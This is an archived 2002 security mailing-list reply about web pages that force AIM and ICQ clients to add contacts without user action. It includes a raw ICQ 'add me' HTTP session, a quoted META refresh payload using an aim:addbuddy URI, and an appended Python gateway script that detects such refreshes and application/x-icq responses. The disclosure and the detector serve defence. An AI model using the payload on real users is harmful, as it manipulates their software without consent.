Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code

From: Bojidar Alexandrov (bojoat_private)
Date: Thu Jul 18 2002 - 00:33:45 PDT


    Knud,
    This issue is still here, only the address that you use is no longer valid,
    because it has changed...
    At the end is the HTTP session (for my ICQ, beware :)).
    Also it seems that no one pays attention to Jelmer's exploit for ICQ and MSIE.
    It must be examined thoroughly for other variants and a complete solution must
    be given to the community!
    ATTENTION: it is a HIGH security risk for clients - it works with almost any
    ICQ and IE, and ICQ must be installed in the default path, or the script has to "guess"
    where, but anyway this is a very common case.
    
    
    Http session for the icq:
    
    GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Accept-Language: bg,en-us;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    Host: wwp.icq.com
    Proxy-Connection: Keep-Alive
    
    HTTP/1.0 200 OK
    Date: Thu, 18 Jul 2002 07:12:12 GMT
    Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d
    P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
    Content-Type: application/x-icq
    Proxy-Connection: close
    
    <!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 -->
    [ICQ User]
    UIN=71398287
    Email=
    NickName=
    FirstName=
    LastName=
    
    
    ----- Original Message -----
    From: "Knud Erik Højgaard" <kainat_private>
    To: "orb" <orbat_private>; <bugtraqat_private>
    Sent: Monday, July 16, 2001 11:44 PM
    Subject: Re: AIM forced behavior "issue"
    
    
    > > Example
    > > <META HTTP-EQUIV="refresh" CONTENT="0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg">
    > >
    > > A web page loaded with the above code in it's META REFRESH tag would
    > > automatically add a group to the users buddylist called mindfliporg and
    > > add buddy's
    > > mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.
    >
    > We tried some similar stuff with icq a while ago, live example at
    > http://knudergud.dk/dev/icq.html ..
    > it seems broken now, but the idea should be obvious. adding to a contact
    > list using javascript, requiring
    > no user interaction.. stupid software.
    >
    > -Knud
    >
    >
    
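The two mechanisms the thread describes, a META refresh whose target is an IM URI scheme and an HTTP response whose Content-Type hands the body to the IM client, are both visible to a web proxy or mail gateway before they ever reach the browser. The following is an added example written for this archive page, not code from the thread, from AOL or from ICQ: a standard-library Python inspector that flags any META refresh pointing at a non-web scheme (it generalises past aim: to icq: or anything else a browser would pass to an external handler) and any response served as application/x-icq. The sample HTML reproduces the sloppy markup from the quoted message (no space before CONTENT, unquoted value) so the parser's tolerance is exercised; the screen names, UIN and response headers are constructed placeholders, not the thread's real accounts.

```python
"""Gateway-side checks for pages that trigger an IM client with no user action.

Added example, not code from the original thread or from AOL/ICQ. Standard
library only. It flags the two things the thread describes: a META refresh
whose target is a non-web URI scheme (aim:, icq:), which the browser hands to
an external handler, and an HTTP response whose Content-Type
(application/x-icq) makes the browser pass the body to the IM client.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Schemes the browser renders itself; anything else invokes an external handler.
WEB_SCHEMES = {"", "http", "https", "ftp"}
# Media types the thread shows being routed to the IM client instead of rendered.
HANDLER_CONTENT_TYPES = {"application/x-icq"}


class _RefreshCollector(HTMLParser):
    """Collect the content= value of every <meta http-equiv="refresh">."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attr = {name.lower(): (value or "") for name, value in attrs}
        if attr.get("http-equiv", "").strip().lower() == "refresh":
            self.refreshes.append(attr.get("content", ""))


def refresh_target(content):
    """Return the URL part of a refresh content value ('0;URL=...'), or ''."""
    parts = content.split(";")
    for i, part in enumerate(parts):
        if part.strip().lower().startswith("url="):
            # Rejoin the tail in case the URL itself contained ';'.
            return ";".join(parts[i:]).strip()[4:].strip().strip("'\"")
    return ""


def find_forced_handlers(html):
    """One finding per META refresh whose target is a non-web scheme.

    Tolerates the markup from the thread: no space before CONTENT and an
    unquoted content value; html.parser still yields the attribute pair.
    """
    collector = _RefreshCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for content in collector.refreshes:
        target = urlsplit(refresh_target(content))
        if target.scheme.lower() in WEB_SCHEMES:
            continue
        findings.append({
            "scheme": target.scheme.lower(),
            "action": target.path,
            "params": {k: v[0] for k, v in parse_qs(target.query).items()},
        })
    return findings


def parse_response_head(raw):
    """Split a raw HTTP response into (status line, {lowercase header: value}, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def handler_content_type(raw):
    """Return the media type if the browser would hand this body to the IM client."""
    _, headers, _ = parse_response_head(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    return media_type if media_type in HANDLER_CONTENT_TYPES else None


def parse_icq_user(body):
    """Parse the INI-style [ICQ User] body into a dict of the fields it carries."""
    fields = {}
    for line in body.splitlines():
        key, eq, value = line.partition("=")
        if eq and not line.startswith(("[", "<!--")):
            fields[key.strip()] = value.strip()
    return fields


# Constructed sample inputs (placeholder names and UIN, not the thread's real accounts).
SAMPLE_HTML = (
    '<html><head><META HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy'
    '?listofscreennames=alice,bob&groupname=examplegroup></head></html>'
)
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: application/x-icq\r\n"
    "Connection: close\r\n"
    "\r\n"
    "[ICQ User]\r\nUIN=00000000\r\nEmail=\r\nNickName=\r\n"
)

if __name__ == "__main__":
    for finding in find_forced_handlers(SAMPLE_HTML):
        print("forced handler invocation:", finding)
    media = handler_content_type(SAMPLE_RESPONSE)
    if media:
        print("body routed to IM client as", media, parse_icq_user(parse_response_head(SAMPLE_RESPONSE)[2]))
```

A gateway that blocks or rewrites on `find_forced_handlers` returning anything non-empty, and that strips or quarantines responses where `handler_content_type` is set, removes the "no user interaction" property both messages complain about; the same allow-list approach covers handlers the thread does not name, since any scheme outside `WEB_SCHEMES` is reported.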